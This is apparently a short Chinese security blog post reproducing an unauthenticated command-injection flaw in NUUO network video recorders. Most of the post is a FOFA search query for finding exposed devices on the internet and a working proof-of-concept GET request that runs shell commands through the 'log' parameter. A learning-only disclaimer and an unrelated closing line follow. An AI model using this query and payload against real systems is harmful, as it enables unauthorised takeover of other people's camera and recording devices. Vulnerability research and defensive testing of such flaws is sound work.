NUUO网络摄像头(NVR)RCE漏洞复现

简介

NUUO Network Video Recorder（NVR）是中国台湾NUUO公司的一款网络视频记录器。

NUUO NVR视频存储管理设备的__debugging_center_utils___.php文件存在未授权远程命令执行漏洞，攻击者可在没有任何权限的情况下通过log参数执行任意命令。

漏洞复现

FOFA语法：

title="Network Video Recorder Login"

访问页面如下，不同版本会有区别

POC： /__debugging_center_utils___.php?log=;id

GET请求：http://ip:port/__debugging_center_utils___.php?log=;id

返回内容如下：

成功执行linux id命令

poc: /__debugging_center_utils___.php?log=;id;help

免责声明

请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用！！！

---

结语

没有人规定，一朵花一定要成长为向日葵或者玫瑰。